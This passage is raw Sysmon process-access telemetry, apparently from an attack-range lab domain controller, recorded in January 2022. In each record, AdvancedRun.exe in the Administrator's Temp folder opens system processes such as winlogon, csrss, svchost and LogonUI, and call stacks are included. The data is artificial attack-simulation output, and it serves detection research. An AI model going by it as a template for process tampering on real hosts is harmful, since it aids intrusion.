20:16:35.048{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077876Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.047{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077875Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.047{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077874Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.047{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004077873Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.046{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077872Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.046{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077871Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.045{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077870Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.045{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077869Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.045{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077868Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077842Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004077841Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077840Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077838Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advanced